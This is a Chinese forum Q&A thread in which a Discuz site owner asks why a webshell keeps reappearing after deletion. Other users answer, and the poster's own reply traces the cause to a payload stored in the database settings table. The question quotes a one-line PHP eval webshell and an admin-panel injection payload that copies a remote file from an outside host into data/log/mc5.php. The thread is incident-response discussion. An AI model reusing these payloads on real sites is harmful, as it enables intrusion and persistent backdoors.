我的discuz论坛被植入后门删掉又出现,用安骑士可以彻底修复吗?
月初的时候收到阿里云的短信通知说论坛的目录中发现有两个webshell的的木马,在discuz论坛的 data/log 目录中,其中一个叫mc5.php文件内的代码为
\"%><?php eval($_POST[ob]);?><%' 我上百度查了下是可以执行任何php程式的木马,另一个php文件代码很多,好像是用来脱库的,于是我立刻删掉了这两个文件。
然后我在discuz后台发现有人盗用了管理员的密码!并在后台执行了以下两行代码(在后台的管理记录中查看到的),两行代码执行的位置都在后台的域名设置中,视乎是利用后台的域名设置选项中的漏洞上传的这个后门! 我当时立刻修改了管理员密码,想说是不是堵住了漏洞!
GET={settingnew={siteuniqueid=9999; my_sitekey=123456; my_siteid=999; }; domainsubmit=提交; }; POST={settingnew={siteuniqueid=9999; my_sitekey=123456; my_siteid=999; }; domainsubmit=提交; };
GET={settingnew={maxsmilies=1{${copy('http://t.34597.vip/tm.txt','./data/log/mc5.php')}}; }; domainsubmit=提交; }; POST={settingnew={maxsmilies=1{${copy('http://t.34597.vip/tm.txt','./data/log/mc5.php')}}; }; domainsubmit=提交; };
但是今天我又收到阿里云的检查到同样的webshell木马,就是那个mc5.php,我上服务器删掉文件,但是立即又生成一个,我去查看discuz的后台管理记录,发现并没有其他人登陆过后台,现在不知道黑客是利用的什么来上传的文件?是不是因为之前管理员密码被盗执行的那两行代码没有得到修复? 我想知道如果购买了安骑士专业版,是可以找出并堵住漏洞还是只能够查出木马然后屏蔽? 如果只是屏蔽不能堵住漏洞的话,跟我现在手动删掉就没啥区别!
写回答
-
Sinesafe专注于网站安全,服务器安全,解决各类网络安全问题,对代码审计以及漏洞修补安全加固有专业的十年实战经验.官方站点www.sinesafe.com发现后门(Webshell)文件是因为网站服务器存在漏洞导致被黑客入侵上传了木马webshell后门导致被阿里云安全提示,需要对提示的木马进行删除,然后进行安全加固,需要对网站漏洞进行修复和清理隐藏的木马后门,如果对程序代码不熟悉的话可以向网站漏洞修复公司SINE安全寻求技术支持。
2022-04-19 10:25:42赞同 展开评论 打赏 -
Re我的discuz论坛被植入后门删掉又出现,用安骑士可以彻底修复吗?这种情况你可以先把discuz后台密码修改为强密码,防止再被黑客进入后台
这种漏洞安骑士现在暂时没法修复的,关键在这行代码
你可以在本地写一个测试脚本
这行代码相当于web的后门,PHP在解析到这段payload的时候,会立刻自动执行并不返回结果,所以你一开始即使修改了密码,黑客只要访问到和maxsmilies有关的页面时,webshell又会自动生成
2016-07-25 10:01:07赞同 展开评论 打赏 -
Re我的discuz论坛被植入后门删掉又出现,用安骑士可以彻底修复吗?自己摸索着解决了,原来是被写入了数据库自动下载那个后门文件!在pre_common_setting这个表里找到相关字段删除即可!希望可以帮到遇到此问题并像我一样的菜鸟!2016-07-16 21:21:20赞同 展开评论 打赏
版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
